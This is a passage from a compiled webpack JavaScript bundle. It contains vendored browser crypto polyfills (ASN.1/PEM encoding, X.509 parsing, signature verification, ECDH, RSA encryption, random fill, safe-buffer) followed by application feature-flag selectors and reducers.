    if (state.tag === 'seqof' || state.tag === 'setof') {
      // TODO(indutny): this should be thrown on DSL level
      if (!(state.args && state.args.length === 1))
        return reporter.error('Too many args for : ' + state.tag);

      if (!Array.isArray(data))
        return reporter.error('seqof/setof, but data is not Array');

      var child = this.clone();
      child._baseState.implicit = null;
      content = this._createEncoderBuffer(data.map(function(item) {
        var state = this._baseState;

        return this._getUse(state.args[0], data)._encode(item, reporter);
      }, child));
    } else if (state.use !== null) {
      result = this._getUse(state.use, parent)._encode(data, reporter);
    } else {
      content = this._encodePrimitive(state.tag, data);
      primitive = true;
    }
  }

  // Encode data itself
  var result;
  if (!state.any && state.choice === null) {
    var tag = state.implicit !== null ? state.implicit : state.tag;
    var cls = state.implicit === null ? 'universal' : 'context';

    if (tag === null) {
      if (state.use === null)
        reporter.error('Tag could be omitted only for .use()');
    } else {
      if (state.use === null)
        result = this._encodeComposite(tag, primitive, cls, content);
    }
  }

  // Wrap in explicit
  if (state.explicit !== null)
    result = this._encodeComposite(state.explicit, false, 'context', result);

  return result;
};

Node.prototype._encodeChoice = function encodeChoice(data, reporter) {
  var state = this._baseState;

  var node = state.choice[data.type];
  if (!node) {
    assert(
        false,
        data.type + ' not found in ' +
            JSON.stringify(Object.keys(state.choice)));
  }
  return node._encode(data.value, reporter);
};

Node.prototype._encodePrimitive = function encodePrimitive(tag, data) {
  var state = this._baseState;

  if (/str$/.test(tag))
    return this._encodeStr(data, tag);
  else if (tag === 'objid' && state.args)
    return this._encodeObjid(data, state.reverseArgs[0], state.args[1]);
  else if (tag === 'objid')
    return this._encodeObjid(data, null, null);
  else if (tag === 'gentime' || tag === 'utctime')
    return this._encodeTime(data, tag);
  else if (tag === 'null_')
    return this._encodeNull();
  else if (tag === 'int' || tag === 'enum')
    return this._encodeInt(data, state.args && state.reverseArgs[0]);
  else if (tag === 'bool')
    return this._encodeBool(data);
  else if (tag === 'objDesc')
    return this._encodeStr(data, tag);
  else
    throw new Error('Unsupported tag: ' + tag);
};

Node.prototype._isNumstr = function isNumstr(str) {
  return /^[0-9 ]*$/.test(str);
};

Node.prototype._isPrintstr = function isPrintstr(str) {
  return /^[A-Za-z0-9 '\(\)\+,\-\.\/:=\?]*$/.test(str);
};


/***/ }),
/* 2732 */
/***/ (function(module, exports, __webpack_require__) {

var constants = __webpack_require__(1261);

exports.tagClass = {
  0: 'universal',
  1: 'application',
  2: 'context',
  3: 'private'
};
exports.tagClassByName = constants._reverse(exports.tagClass);

exports.tag = {
  0x00: 'end',
  0x01: 'bool',
  0x02: 'int',
  0x03: 'bitstr',
  0x04: 'octstr',
  0x05: 'null_',
  0x06: 'objid',
  0x07: 'objDesc',
  0x08: 'external',
  0x09: 'real',
  0x0a: 'enum',
  0x0b: 'embed',
  0x0c: 'utf8str',
  0x0d: 'relativeOid',
  0x10: 'seq',
  0x11: 'set',
  0x12: 'numstr',
  0x13: 'printstr',
  0x14: 't61str',
  0x15: 'videostr',
  0x16: 'ia5str',
  0x17: 'utctime',
  0x18: 'gentime',
  0x19: 'graphstr',
  0x1a: 'iso646str',
  0x1b: 'genstr',
  0x1c: 'unistr',
  0x1d: 'charstr',
  0x1e: 'bmpstr'
};
exports.tagByName = constants._reverse(exports.tag);


/***/ }),
/* 2733 */
/***/ (function(module, exports, __webpack_require__) {

var decoders = exports;

decoders.der = __webpack_require__(1262);
decoders.pem = __webpack_require__(2734);


/***/ }),
/* 2734 */
/***/ (function(module, exports, __webpack_require__) {

var inherits = __webpack_require__(25);
var Buffer = __webpack_require__(43).Buffer;

var DERDecoder = __webpack_require__(1262);

function PEMDecoder(entity) {
  DERDecoder.call(this, entity);
  this.enc = 'pem';
};
inherits(PEMDecoder, DERDecoder);
module.exports = PEMDecoder;

PEMDecoder.prototype.decode = function decode(data, options) {
  var lines = data.toString().split(/[\r\n]+/g);

  var label = options.label.toUpperCase();

  var re = /^-----(BEGIN|END) ([^-]+)-----$/;
  var start = -1;
  var end = -1;
  for (var i = 0; i < lines.length; i++) {
    var match = lines[i].match(re);
    if (match === null)
      continue;

    if (match[2] !== label)
      continue;

    if (start === -1) {
      if (match[1] !== 'BEGIN')
        break;
      start = i;
    } else {
      if (match[1] !== 'END')
        break;
      end = i;
      break;
    }
  }
  if (start === -1 || end === -1)
    throw new Error('PEM section not found for: ' + label);

  var base64 = lines.slice(start + 1, end).join('');
  // Remove excessive symbols
  base64.replace(/[^a-z0-9\+\/=]+/gi, '');

  var input = new Buffer(base64, 'base64');
  return DERDecoder.prototype.decode.call(this, input, options);
};


/***/ }),
/* 2735 */
/***/ (function(module, exports, __webpack_require__) {

var encoders = exports;

encoders.der = __webpack_require__(1263);
encoders.pem = __webpack_require__(2736);


/***/ }),
/* 2736 */
/***/ (function(module, exports, __webpack_require__) {

var inherits = __webpack_require__(25);

var DEREncoder = __webpack_require__(1263);

function PEMEncoder(entity) {
  DEREncoder.call(this, entity);
  this.enc = 'pem';
};
inherits(PEMEncoder, DEREncoder);
module.exports = PEMEncoder;

PEMEncoder.prototype.encode = function encode(data, options) {
  var buf = DEREncoder.prototype.encode.call(this, data);

  var p = buf.toString('base64');
  var out = [ '-----BEGIN ' + options.label + '-----' ];
  for (var i = 0; i < p.length; i += 64)
    out.push(p.slice(i, i + 64));
  out.push('-----END ' + options.label + '-----');
  return out.join('\n');
};


/***/ }),
/* 2737 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";
// from https://github.com/Rantanen/node-dtls/blob/25a7dc861bda38cfeac93a723500eea4f0ac2e86/Certificate.js
// thanks to @Rantanen



var asn = __webpack_require__(351)

var Time = asn.define('Time', function () {
  this.choice({
    utcTime: this.utctime(),
    generalTime: this.gentime()
  })
})

var AttributeTypeValue = asn.define('AttributeTypeValue', function () {
  this.seq().obj(
    this.key('type').objid(),
    this.key('value').any()
  )
})

var AlgorithmIdentifier = asn.define('AlgorithmIdentifier', function () {
  this.seq().obj(
    this.key('algorithm').objid(),
    this.key('parameters').optional()
  )
})

var SubjectPublicKeyInfo = asn.define('SubjectPublicKeyInfo', function () {
  this.seq().obj(
    this.key('algorithm').use(AlgorithmIdentifier),
    this.key('subjectPublicKey').bitstr()
  )
})

var RelativeDistinguishedName = asn.define('RelativeDistinguishedName', function () {
  this.setof(AttributeTypeValue)
})

var RDNSequence = asn.define('RDNSequence', function () {
  this.seqof(RelativeDistinguishedName)
})

var Name = asn.define('Name', function () {
  this.choice({
    rdnSequence: this.use(RDNSequence)
  })
})

var Validity = asn.define('Validity', function () {
  this.seq().obj(
    this.key('notBefore').use(Time),
    this.key('notAfter').use(Time)
  )
})

var Extension = asn.define('Extension', function () {
  this.seq().obj(
    this.key('extnID').objid(),
    this.key('critical').bool().def(false),
    this.key('extnValue').octstr()
  )
})

var TBSCertificate = asn.define('TBSCertificate', function () {
  this.seq().obj(
    this.key('version').explicit(0).int(),
    this.key('serialNumber').int(),
    this.key('signature').use(AlgorithmIdentifier),
    this.key('issuer').use(Name),
    this.key('validity').use(Validity),
    this.key('subject').use(Name),
    this.key('subjectPublicKeyInfo').use(SubjectPublicKeyInfo),
    this.key('issuerUniqueID').implicit(1).bitstr().optional(),
    this.key('subjectUniqueID').implicit(2).bitstr().optional(),
    this.key('extensions').explicit(3).seqof(Extension).optional()
  )
})

var X509Certificate = asn.define('X509Certificate', function () {
  this.seq().obj(
    this.key('tbsCertificate').use(TBSCertificate),
    this.key('signatureAlgorithm').use(AlgorithmIdentifier),
    this.key('signatureValue').bitstr()
  )
})

module.exports = X509Certificate


/***/ }),
/* 2738 */
/***/ (function(module, exports) {

module.exports = {"2.16.840.1.101.3.4.1.1":"aes-128-ecb","2.16.840.1.101.3.4.1.2":"aes-128-cbc","2.16.840.1.101.3.4.1.3":"aes-128-ofb","2.16.840.1.101.3.4.1.4":"aes-128-cfb","2.16.840.1.101.3.4.1.21":"aes-192-ecb","2.16.840.1.101.3.4.1.22":"aes-192-cbc","2.16.840.1.101.3.4.1.23":"aes-192-ofb","2.16.840.1.101.3.4.1.24":"aes-192-cfb","2.16.840.1.101.3.4.1.41":"aes-256-ecb","2.16.840.1.101.3.4.1.42":"aes-256-cbc","2.16.840.1.101.3.4.1.43":"aes-256-ofb","2.16.840.1.101.3.4.1.44":"aes-256-cfb"}

/***/ }),
/* 2739 */
/***/ (function(module, exports, __webpack_require__) {

/* WEBPACK VAR INJECTION */(function(Buffer) {// adapted from https://github.com/apatil/pemstrip
var findProc = /Proc-Type: 4,ENCRYPTED[\n\r]+DEK-Info: AES-((?:128)|(?:192)|(?:256))-CBC,([0-9A-H]+)[\n\r]+([0-9A-z\n\r\+\/\=]+)[\n\r]+/m
var startRegex = /^-----BEGIN ((?:.* KEY)|CERTIFICATE)-----/m
var fullRegex = /^-----BEGIN ((?:.* KEY)|CERTIFICATE)-----([0-9A-z\n\r\+\/\=]+)-----END \1-----$/m
var evp = __webpack_require__(489)
var ciphers = __webpack_require__(692)
module.exports = function (okey, password) {
  var key = okey.toString()
  var match = key.match(findProc)
  var decrypted
  if (!match) {
    var match2 = key.match(fullRegex)
    decrypted = new Buffer(match2[2].replace(/[\r\n]/g, ''), 'base64')
  } else {
    var suite = 'aes' + match[1]
    var iv = new Buffer(match[2], 'hex')
    var cipherText = new Buffer(match[3].replace(/[\r\n]/g, ''), 'base64')
    var cipherKey = evp(password, iv.slice(0, 8), parseInt(match[1], 10)).key
    var out = []
    var cipher = ciphers.createDecipheriv(suite, cipherKey, iv)
    out.push(cipher.update(cipherText))
    out.push(cipher.final())
    decrypted = Buffer.concat(out)
  }
  var tag = key.match(startRegex)[1]
  return {
    tag: tag,
    data: decrypted
  }
}

/* WEBPACK VAR INJECTION */}.call(exports, __webpack_require__(43).Buffer))

/***/ }),
/* 2740 */
/***/ (function(module, exports, __webpack_require__) {

/* WEBPACK VAR INJECTION */(function(Buffer) {// much of this based on https://github.com/indutny/self-signed/blob/gh-pages/lib/rsa.js
var BN = __webpack_require__(63)
var EC = __webpack_require__(91).ec
var parseKeys = __webpack_require__(491)
var curves = __webpack_require__(1264)

function verify (sig, hash, key, signType, tag) {
  var pub = parseKeys(key)
  if (pub.type === 'ec') {
    // rsa keys can be interpreted as ecdsa ones in openssl
    if (signType !== 'ecdsa' && signType !== 'ecdsa/rsa') throw new Error('wrong public key type')
    return ecVerify(sig, hash, pub)
  } else if (pub.type === 'dsa') {
    if (signType !== 'dsa') throw new Error('wrong public key type')
    return dsaVerify(sig, hash, pub)
  } else {
    if (signType !== 'rsa' && signType !== 'ecdsa/rsa') throw new Error('wrong public key type')
  }
  hash = Buffer.concat([tag, hash])
  var len = pub.modulus.byteLength()
  var pad = [ 1 ]
  var padNum = 0
  while (hash.length + pad.length + 2 < len) {
    pad.push(0xff)
    padNum++
  }
  pad.push(0x00)
  var i = -1
  while (++i < hash.length) {
    pad.push(hash[i])
  }
  pad = new Buffer(pad)
  var red = BN.mont(pub.modulus)
  sig = new BN(sig).toRed(red)

  sig = sig.redPow(new BN(pub.publicExponent))
  sig = new Buffer(sig.fromRed().toArray())
  var out = padNum < 8 ? 1 : 0
  len = Math.min(sig.length, pad.length)
  if (sig.length !== pad.length) out = 1

  i = -1
  while (++i < len) out |= sig[i] ^ pad[i]
  return out === 0
}

function ecVerify (sig, hash, pub) {
  var curveId = curves[pub.data.algorithm.curve.join('.')]
  if (!curveId) throw new Error('unknown curve ' + pub.data.algorithm.curve.join('.'))

  var curve = new EC(curveId)
  var pubkey = pub.data.subjectPrivateKey.data

  return curve.verify(hash, sig, pubkey)
}

function dsaVerify (sig, hash, pub) {
  var p = pub.data.p
  var q = pub.data.q
  var g = pub.data.g
  var y = pub.data.pub_key
  var unpacked = parseKeys.signature.decode(sig, 'der')
  var s = unpacked.s
  var r = unpacked.r
  checkValue(s, q)
  checkValue(r, q)
  var montp = BN.mont(p)
  var w = s.invm(q)
  var v = g.toRed(montp)
    .redPow(new BN(hash).mul(w).mod(q))
    .fromRed()
    .mul(y.toRed(montp).redPow(r.mul(w).mod(q)).fromRed())
    .mod(p)
    .mod(q)
  return v.cmp(r) === 0
}

function checkValue (b, q) {
  if (b.cmpn(0) <= 0) throw new Error('invalid sig')
  if (b.cmp(q) >= q) throw new Error('invalid sig')
}

module.exports = verify

/* WEBPACK VAR INJECTION */}.call(exports, __webpack_require__(43).Buffer))

/***/ }),
/* 2741 */
/***/ (function(module, exports, __webpack_require__) {

/* WEBPACK VAR INJECTION */(function(Buffer) {var elliptic = __webpack_require__(91)
var BN = __webpack_require__(63)

module.exports = function createECDH (curve) {
  return new ECDH(curve)
}

var aliases = {
  secp256k1: {
    name: 'secp256k1',
    byteLength: 32
  },
  secp224r1: {
    name: 'p224',
    byteLength: 28
  },
  prime256v1: {
    name: 'p256',
    byteLength: 32
  },
  prime192v1: {
    name: 'p192',
    byteLength: 24
  },
  ed25519: {
    name: 'ed25519',
    byteLength: 32
  },
  secp384r1: {
    name: 'p384',
    byteLength: 48
  },
  secp521r1: {
    name: 'p521',
    byteLength: 66
  }
}

aliases.p224 = aliases.secp224r1
aliases.p256 = aliases.secp256r1 = aliases.prime256v1
aliases.p192 = aliases.secp192r1 = aliases.prime192v1
aliases.p384 = aliases.secp384r1
aliases.p521 = aliases.secp521r1

function ECDH (curve) {
  this.curveType = aliases[curve]
  if (!this.curveType) {
    this.curveType = {
      name: curve
    }
  }
  this.curve = new elliptic.ec(this.curveType.name) // eslint-disable-line new-cap
  this.keys = void 0
}

ECDH.prototype.generateKeys = function (enc, format) {
  this.keys = this.curve.genKeyPair()
  return this.getPublicKey(enc, format)
}

ECDH.prototype.computeSecret = function (other, inenc, enc) {
  inenc = inenc || 'utf8'
  if (!Buffer.isBuffer(other)) {
    other = new Buffer(other, inenc)
  }
  var otherPub = this.curve.keyFromPublic(other).getPublic()
  var out = otherPub.mul(this.keys.getPrivate()).getX()
  return formatReturnValue(out, enc, this.curveType.byteLength)
}

ECDH.prototype.getPublicKey = function (enc, format) {
  var key = this.keys.getPublic(format === 'compressed', true)
  if (format === 'hybrid') {
    if (key[key.length - 1] % 2) {
      key[0] = 7
    } else {
      key[0] = 6
    }
  }
  return formatReturnValue(key, enc)
}

ECDH.prototype.getPrivateKey = function (enc) {
  return formatReturnValue(this.keys.getPrivate(), enc)
}

ECDH.prototype.setPublicKey = function (pub, enc) {
  enc = enc || 'utf8'
  if (!Buffer.isBuffer(pub)) {
    pub = new Buffer(pub, enc)
  }
  this.keys._importPublic(pub)
  return this
}

ECDH.prototype.setPrivateKey = function (priv, enc) {
  enc = enc || 'utf8'
  if (!Buffer.isBuffer(priv)) {
    priv = new Buffer(priv, enc)
  }

  var _priv = new BN(priv)
  _priv = _priv.toString(16)
  this.keys = this.curve.genKeyPair()
  this.keys._importPrivate(_priv)
  return this
}

function formatReturnValue (bn, enc, len) {
  if (!Array.isArray(bn)) {
    bn = bn.toArray()
  }
  var buf = new Buffer(bn)
  if (len && buf.length < len) {
    var zeros = new Buffer(len - buf.length)
    zeros.fill(0)
    buf = Buffer.concat([zeros, buf])
  }
  if (!enc) {
    return buf
  } else {
    return buf.toString(enc)
  }
}

/* WEBPACK VAR INJECTION */}.call(exports, __webpack_require__(43).Buffer))

/***/ }),
/* 2742 */
/***/ (function(module, exports, __webpack_require__) {

exports.publicEncrypt = __webpack_require__(2743)
exports.privateDecrypt = __webpack_require__(2744)

exports.privateEncrypt = function privateEncrypt (key, buf) {
  return exports.publicEncrypt(key, buf, true)
}

exports.publicDecrypt = function publicDecrypt (key, buf) {
  return exports.privateDecrypt(key, buf, true)
}


/***/ }),
/* 2743 */
/***/ (function(module, exports, __webpack_require__) {

var parseKeys = __webpack_require__(491)
var randomBytes = __webpack_require__(274)
var createHash = __webpack_require__(346)
var mgf = __webpack_require__(1265)
var xor = __webpack_require__(1266)
var BN = __webpack_require__(63)
var withPublic = __webpack_require__(1267)
var crt = __webpack_require__(694)
var Buffer = __webpack_require__(41).Buffer

module.exports = function publicEncrypt (publicKey, msg, reverse) {
  var padding
  if (publicKey.padding) {
    padding = publicKey.padding
  } else if (reverse) {
    padding = 1
  } else {
    padding = 4
  }
  var key = parseKeys(publicKey)
  var paddedMsg
  if (padding === 4) {
    paddedMsg = oaep(key, msg)
  } else if (padding === 1) {
    paddedMsg = pkcs1(key, msg, reverse)
  } else if (padding === 3) {
    paddedMsg = new BN(msg)
    if (paddedMsg.cmp(key.modulus) >= 0) {
      throw new Error('data too long for modulus')
    }
  } else {
    throw new Error('unknown padding')
  }
  if (reverse) {
    return crt(paddedMsg, key)
  } else {
    return withPublic(paddedMsg, key)
  }
}

function oaep (key, msg) {
  var k = key.modulus.byteLength()
  var mLen = msg.length
  var iHash = createHash('sha1').update(Buffer.alloc(0)).digest()
  var hLen = iHash.length
  var hLen2 = 2 * hLen
  if (mLen > k - hLen2 - 2) {
    throw new Error('message too long')
  }
  var ps = Buffer.alloc(k - mLen - hLen2 - 2)
  var dblen = k - hLen - 1
  var seed = randomBytes(hLen)
  var maskedDb = xor(Buffer.concat([iHash, ps, Buffer.alloc(1, 1), msg], dblen), mgf(seed, dblen))
  var maskedSeed = xor(seed, mgf(maskedDb, hLen))
  return new BN(Buffer.concat([Buffer.alloc(1), maskedSeed, maskedDb], k))
}
function pkcs1 (key, msg, reverse) {
  var mLen = msg.length
  var k = key.modulus.byteLength()
  if (mLen > k - 11) {
    throw new Error('message too long')
  }
  var ps
  if (reverse) {
    ps = Buffer.alloc(k - mLen - 3, 0xff)
  } else {
    ps = nonZero(k - mLen - 3)
  }
  return new BN(Buffer.concat([Buffer.from([0, reverse ? 1 : 2]), ps, Buffer.alloc(1), msg], k))
}
function nonZero (len) {
  var out = Buffer.allocUnsafe(len)
  var i = 0
  var cache = randomBytes(len * 2)
  var cur = 0
  var num
  while (i < len) {
    if (cur === cache.length) {
      cache = randomBytes(len * 2)
      cur = 0
    }
    num = cache[cur++]
    if (num) {
      out[i++] = num
    }
  }
  return out
}


/***/ }),
/* 2744 */
/***/ (function(module, exports, __webpack_require__) {

var parseKeys = __webpack_require__(491)
var mgf = __webpack_require__(1265)
var xor = __webpack_require__(1266)
var BN = __webpack_require__(63)
var crt = __webpack_require__(694)
var createHash = __webpack_require__(346)
var withPublic = __webpack_require__(1267)
var Buffer = __webpack_require__(41).Buffer

module.exports = function privateDecrypt (privateKey, enc, reverse) {
  var padding
  if (privateKey.padding) {
    padding = privateKey.padding
  } else if (reverse) {
    padding = 1
  } else {
    padding = 4
  }

  var key = parseKeys(privateKey)
  var k = key.modulus.byteLength()
  if (enc.length > k || new BN(enc).cmp(key.modulus) >= 0) {
    throw new Error('decryption error')
  }
  var msg
  if (reverse) {
    msg = withPublic(new BN(enc), key)
  } else {
    msg = crt(enc, key)
  }
  var zBuffer = Buffer.alloc(k - msg.length)
  msg = Buffer.concat([zBuffer, msg], k)
  if (padding === 4) {
    return oaep(key, msg)
  } else if (padding === 1) {
    return pkcs1(key, msg, reverse)
  } else if (padding === 3) {
    return msg
  } else {
    throw new Error('unknown padding')
  }
}

function oaep (key, msg) {
  var k = key.modulus.byteLength()
  var iHash = createHash('sha1').update(Buffer.alloc(0)).digest()
  var hLen = iHash.length
  if (msg[0] !== 0) {
    throw new Error('decryption error')
  }
  var maskedSeed = msg.slice(1, hLen + 1)
  var maskedDb = msg.slice(hLen + 1)
  var seed = xor(maskedSeed, mgf(maskedDb, hLen))
  var db = xor(maskedDb, mgf(seed, k - hLen - 1))
  if (compare(iHash, db.slice(0, hLen))) {
    throw new Error('decryption error')
  }
  var i = hLen
  while (db[i] === 0) {
    i++
  }
  if (db[i++] !== 1) {
    throw new Error('decryption error')
  }
  return db.slice(i)
}

function pkcs1 (key, msg, reverse) {
  var p1 = msg.slice(0, 2)
  var i = 2
  var status = 0
  while (msg[i++] !== 0) {
    if (i >= msg.length) {
      status++
      break
    }
  }
  var ps = msg.slice(2, i - 1)

  if ((p1.toString('hex') !== '0002' && !reverse) || (p1.toString('hex') !== '0001' && reverse)) {
    status++
  }
  if (ps.length < 8) {
    status++
  }
  if (status) {
    throw new Error('decryption error')
  }
  return msg.slice(i)
}
function compare (a, b) {
  a = Buffer.from(a)
  b = Buffer.from(b)
  var dif = 0
  var len = a.length
  if (a.length !== b.length) {
    dif++
    len = Math.min(a.length, b.length)
  }
  var i = -1
  while (++i < len) {
    dif += (a[i] ^ b[i])
  }
  return dif
}


/***/ }),
/* 2745 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";
/* WEBPACK VAR INJECTION */(function(global, process) {

function oldBrowser () {
  throw new Error('secure random number generation not supported by this browser\nuse chrome, FireFox or Internet Explorer 11')
}
var safeBuffer = __webpack_require__(2746)
var randombytes = __webpack_require__(274)
var Buffer = safeBuffer.Buffer
var kBufferMaxLength = safeBuffer.kMaxLength
var crypto = global.crypto || global.msCrypto
var kMaxUint32 = Math.pow(2, 32) - 1
function assertOffset (offset, length) {
  if (typeof offset !== 'number' || offset !== offset) { // eslint-disable-line no-self-compare
    throw new TypeError('offset must be a number')
  }

  if (offset > kMaxUint32 || offset < 0) {
    throw new TypeError('offset must be a uint32')
  }

  if (offset > kBufferMaxLength || offset > length) {
    throw new RangeError('offset out of range')
  }
}

function assertSize (size, offset, length) {
  if (typeof size !== 'number' || size !== size) { // eslint-disable-line no-self-compare
    throw new TypeError('size must be a number')
  }

  if (size > kMaxUint32 || size < 0) {
    throw new TypeError('size must be a uint32')
  }

  if (size + offset > length || size > kBufferMaxLength) {
    throw new RangeError('buffer too small')
  }
}
if ((crypto && crypto.getRandomValues) || !process.browser) {
  exports.randomFill = randomFill
  exports.randomFillSync = randomFillSync
} else {
  exports.randomFill = oldBrowser
  exports.randomFillSync = oldBrowser
}
function randomFill (buf, offset, size, cb) {
  if (!Buffer.isBuffer(buf) && !(buf instanceof global.Uint8Array)) {
    throw new TypeError('"buf" argument must be a Buffer or Uint8Array')
  }

  if (typeof offset === 'function') {
    cb = offset
    offset = 0
    size = buf.length
  } else if (typeof size === 'function') {
    cb = size
    size = buf.length - offset
  } else if (typeof cb !== 'function') {
    throw new TypeError('"cb" argument must be a function')
  }
  assertOffset(offset, buf.length)
  assertSize(size, offset, buf.length)
  return actualFill(buf, offset, size, cb)
}

function actualFill (buf, offset, size, cb) {
  if (process.browser) {
    var ourBuf = buf.buffer
    var uint = new Uint8Array(ourBuf, offset, size)
    crypto.getRandomValues(uint)
    if (cb) {
      process.nextTick(function () {
        cb(null, buf)
      })
      return
    }
    return buf
  }
  if (cb) {
    randombytes(size, function (err, bytes) {
      if (err) {
        return cb(err)
      }
      bytes.copy(buf, offset)
      cb(null, buf)
    })
    return
  }
  var bytes = randombytes(size)
  bytes.copy(buf, offset)
  return buf
}
function randomFillSync (buf, offset, size) {
  if (typeof offset === 'undefined') {
    offset = 0
  }
  if (!Buffer.isBuffer(buf) && !(buf instanceof global.Uint8Array)) {
    throw new TypeError('"buf" argument must be a Buffer or Uint8Array')
  }

  assertOffset(offset, buf.length)

  if (size === undefined) size = buf.length - offset

  assertSize(size, offset, buf.length)

  return actualFill(buf, offset, size)
}

/* WEBPACK VAR INJECTION */}.call(exports, __webpack_require__(17), __webpack_require__(83)))

/***/ }),
/* 2746 */
/***/ (function(module, exports, __webpack_require__) {

/* eslint-disable node/no-deprecated-api */
var buffer = __webpack_require__(43)
var Buffer = buffer.Buffer

// alternative to using Object.keys for old browsers
function copyProps (src, dst) {
  for (var key in src) {
    dst[key] = src[key]
  }
}
if (Buffer.from && Buffer.alloc && Buffer.allocUnsafe && Buffer.allocUnsafeSlow) {
  module.exports = buffer
} else {
  // Copy properties from require('buffer')
  copyProps(buffer, exports)
  exports.Buffer = SafeBuffer
}

function SafeBuffer (arg, encodingOrOffset, length) {
  return Buffer(arg, encodingOrOffset, length)
}

// Copy static methods from Buffer
copyProps(Buffer, SafeBuffer)

SafeBuffer.from = function (arg, encodingOrOffset, length) {
  if (typeof arg === 'number') {
    throw new TypeError('Argument must not be a number')
  }
  return Buffer(arg, encodingOrOffset, length)
}

SafeBuffer.alloc = function (size, fill, encoding) {
  if (typeof size !== 'number') {
    throw new TypeError('Argument must be a number')
  }
  var buf = Buffer(size)
  if (fill !== undefined) {
    if (typeof encoding === 'string') {
      buf.fill(fill, encoding)
    } else {
      buf.fill(fill)
    }
  } else {
    buf.fill(0)
  }
  return buf
}

SafeBuffer.allocUnsafe = function (size) {
  if (typeof size !== 'number') {
    throw new TypeError('Argument must be a number')
  }
  return Buffer(size)
}

SafeBuffer.allocUnsafeSlow = function (size) {
  if (typeof size !== 'number') {
    throw new TypeError('Argument must be a number')
  }
  return buffer.SlowBuffer(size)
}


/***/ }),
/* 2747 */,
/* 2748 */,
/* 2749 */
/***/ (function(module, exports) {



/***/ }),
/* 2750 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "flags", function() { return flags; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "loading", function() { return loading; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getFlag", function() { return getFlag; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getFlagTreatment", function() { return getFlagTreatment; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getFlagConfig", function() { return getFlagConfig; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "isFeatureEnabled", function() { return isFeatureEnabled; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "isFeatureDisabled", function() { return isFeatureDisabled; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reselect__ = __webpack_require__(34);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reselect___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_reselect__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__constants__ = __webpack_require__(302);




var flags = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['features', 'flags']);
var loading = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['features', 'loading']);

var getFlag = function getFlag(featureName) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(flags, function (treatments) {
    return treatments.get(featureName);
  });
};

var getFlagTreatment = function getFlagTreatment(featureName) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(getFlag(featureName), function (flag) {
    return flag.get('treatment');
  });
};

var getFlagConfig = function getFlagConfig(featureName) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(getFlag(featureName), function (flag) {
    return flag.get('config');
  });
};

var isFeatureEnabled = function isFeatureEnabled(featureName) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(getFlagTreatment(featureName), function (featureTreatment) {
    return featureTreatment === __WEBPACK_IMPORTED_MODULE_2__constants__["d" /* treatments */].ON;
  });
};

var isFeatureDisabled = function isFeatureDisabled(featureName) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(getFlagTreatment(featureName), function (featureTreatment) {
    return featureTreatment === __WEBPACK_IMPORTED_MODULE_2__constants__["d" /* treatments */].OFF;
  });
};

/***/ }),
/* 2751 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export flags */
/* unused harmony export loading */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable__ = __webpack_require__(20);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__action_types_js__ = __webpack_require__(1270);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_modules_profile_action_types_js__ = __webpack_require__(116);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__constants__ = __webpack_require__(302);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__types_js__ = __webpack_require__(1269);










var flags = function flags() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_5__types_js__["a" /* flagsToOrderedMap */])(__WEBPACK_IMPORTED_MODULE_4__constants__["a" /* defaultTreatments */]);
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["a" /* FEATURES_UPDATED */]:
      var x = Object(__WEBPACK_IMPORTED_MODULE_5__types_js__["a" /* flagsToOrderedMap */])(payload);
      return x;
    default:
      return state;
  }
};

var loading = function loading() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["b" /* SPLIT_SDK_READY */]:
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["d" /* SPLIT_SDK_UPDATE */]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["c" /* SPLIT_SDK_READY_TIMED_OUT */]:
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["a" /* FEATURES_UPDATED */]:
      return false;
    default:
      return state;
  }
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__["combineReducers"])({
  flags: flags,
  loading: loading
}));

/***/ }),
/* 2752 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
